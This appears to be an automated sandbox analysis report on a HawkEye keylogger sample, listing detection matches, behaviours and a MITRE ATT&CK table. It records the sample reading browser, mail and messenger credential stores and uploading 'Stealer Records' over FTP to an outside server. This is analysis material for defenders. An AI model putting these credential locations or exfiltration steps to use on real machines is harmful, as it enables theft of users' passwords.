            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 19_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_00407674 GetVersionExW,
            Source: C:\Users\user\Desktop\ypBoHI5G3x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: InstallUtil.exe, 0000000C.00000002.602019864.0000000001013000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information:

            Yara detected HawkEye Keylogger
            Source: Yara match File source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY
            Yara detected MailPassView
            Source: Yara match File source: 12.2.InstallUtil.exe.3b39930.7.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.45fa72.2.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.3b39930.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara match File source: Process Memory Space: vbc.exe PID: 5432, type: MEMORY
            Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
            Tries to steal Mail credentials (via file access)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Tries to steal Mail credentials (via file registry)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword
            Yara detected WebBrowserPassView password recovery tool
            Source: Yara match File source: 12.2.InstallUtil.exe.3b39930.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a36f7.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.409c0d.3.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.3b51b50.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.439c2d7.6.unpack, type: UNPACKEDPE
            Source: Yara match File source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.3b51b50.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara match File source: Process Memory Space: vbc.exe PID: 5560, type: MEMORY
            Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY

            Remote Access Functionality:

            Detected HawkEye Rat
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: ypBoHI5G3x.exe, 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Source: InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp String found in binary or memory: HawkEyeKeylogger
            Source: InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp String found in binary or memory: l&HawkEye_Keylogger_Execution_Confirmed_
            Source: InstallUtil.exe, 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp String found in binary or memory: l"HawkEye_Keylogger_Stealer_Records_
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmp String found in binary or memory: lBHawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmp String found in binary or memory: lXftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmp String found in binary or memory: ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_841618%207.27.2021%2011:21:35%20AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602869141.0000000002BF3000.00000004.00000001.sdmp String found in binary or memory: l^ftp://ftp.vngpack.com/HawkEye_Keylogger_Stealer_Records_841618%207.27.2021%2011:21:35%20AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602895043.0000000002BFF000.00000004.00000001.sdmp String found in binary or memory: lBHawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txtP
            Source: InstallUtil.exe, 0000000C.00000002.602895043.0000000002BFF000.00000004.00000001.sdmp String found in binary or memory: lISTOR HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.602895043.0000000002BFF000.00000004.00000001.sdmp String found in binary or memory: STOR HawkEye_Keylogger_Stealer_Records_841618 7.27.2021 11:21:35 AM.txt
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
            Source: InstallUtil.exe, 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
            Yara detected HawkEye Keylogger
            Source: Yara match File source: 12.2.InstallUtil.exe.45fa72.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.2b5b2a0.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a1cf2.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.408208.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.419b8ea.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.41a36f7.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 12.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 1.2.ypBoHI5G3x.exe.43944ca.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439c2d7.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.ypBoHI5G3x.exe.439a8d2.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.602473757.0000000002B31000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455567208.0000000004312000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.455392795.000000000419B000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ypBoHI5G3x.exe PID: 6504, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6456, type: MEMORY

            Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Windows Management Instrumentation1 | Application Shimming1 | Application Shimming1 | Disable or Modify Tools1 | OS Credential Dumping1 | System Time Discovery1 | Replication Through Removable Media1 | Archive Collected Data11 | Exfiltration Over Alternative Protocol1 | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media1 | Native API11 | Valid Accounts1 | Valid Accounts1 | Deobfuscate/Decode Files or Information11 | Input Capture1 | Peripheral Device Discovery1 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
